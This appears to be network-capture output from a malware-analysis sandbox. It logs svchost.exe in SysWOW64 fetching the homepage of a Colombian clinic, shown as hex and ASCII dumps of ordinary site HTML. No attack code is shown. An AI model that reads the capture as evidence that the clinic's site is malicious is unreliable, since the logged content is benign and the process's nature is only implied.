                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          64192.168.2.65316172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6321OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6420INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Set-Cookie: d55e479f054c94814cbc10d217aaa990=51a97816482a5e996190b8f16b619322; path=/; HttpOnly
                                                                                                                                                                                                                                                                          Last-Modified: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aWnngjlcQsGZKCcHJhzToe5rt6VJMcVB8AS%2FrkRdaCl%2FPUgbeaFS7Ig11f5heScUFHzfuoV42jnsAIZAIyLRWjfIpqrsNsvrl%2BzKammCrakVLDAZ9N39NFubEDteZNccuggoZhinCcs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6e016a029036-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6421INData Raw: 37 63 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 7c50<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6422INData Raw: 62 6f 78 2f 61 73 73 65 74 73 2f 73 74 79 6c 65 73 2f 72 6f 6b 62 6f 78 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 6f 64 75 6c 65 73 2f 6d 6f 64 5f 70 6f 70 75 70 61 68 6f 6c 69 63 2f 63 73 73 2f 6a 71 75 65 72 79 2e 67 61 66 61 6e 63 79 62 6f 78 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75
                                                                                                                                                                                                                                                                          Data Ascii: box/assets/styles/rokbox.css" rel="stylesheet" /><link href="/modules/mod_popupaholic/css/jquery.gafancybox.min.css" rel="stylesheet" /><link href="/media/gantry5/assets/css/font-awesome.min.css" rel="stylesheet" /><link href="/media/gantry5/users/nu
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6423INData Raw: 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 70 6c 75 67 69 6e 73 2f 73 79 73 74 65 6d 2f 72 6f
                                                                                                                                                                                                                                                                          Data Ascii: 9da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/plugins/system/ro
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6424INData Raw: 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 6c 69 6e 6b 20 72 65
                                                                                                                                                                                                                                                                          Data Ascii: n.js"></script> <link rel="stylesheet" href="/media/gantry5/users/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <![endif]--><link re
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6426INData Raw: 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d
                                                                                                                                                                                                                                                                          Data Ascii: " alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><li class="g-menu-item g-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6427INData Raw: 70 61 72 65 6e 74 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75
                                                                                                                                                                                                                                                                          Data Ascii: parent><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu-item-content"><span class="g-menu
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6428INData Raw: 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65
                                                                                                                                                                                                                                                                          Data Ascii: nu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent> <span class="g-se
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6430INData Raw: 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61
                                                                                                                                                                                                                                                                          Data Ascii: <span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6431INData Raw: 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: linica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6432INData Raw: 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3
                                                                                                                                                                                                                                                                          Data Ascii: tem-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donaci
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6434INData Raw: 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73
                                                                                                                                                                                                                                                                          Data Ascii: pan></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></s
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6435INData Raw: 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c
                                                                                                                                                                                                                                                                          Data Ascii: </span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6436INData Raw: 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65
                                                                                                                                                                                                                                                                          Data Ascii: ponent g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-me
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6438INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20
                                                                                                                                                                                                                                                                          Data Ascii: div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6439INData Raw: 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66
                                                                                                                                                                                                                                                                          Data Ascii: closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gaf
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6440INData Raw: 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65
                                                                                                                                                                                                                                                                          Data Ascii: document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" targe
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6442INData Raw: 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 22 3e 0a 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 69 74 61 2d 6d
                                                                                                                                                                                                                                                                          Data Ascii: g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-button"><a href="/index.php/contacto/cita-m
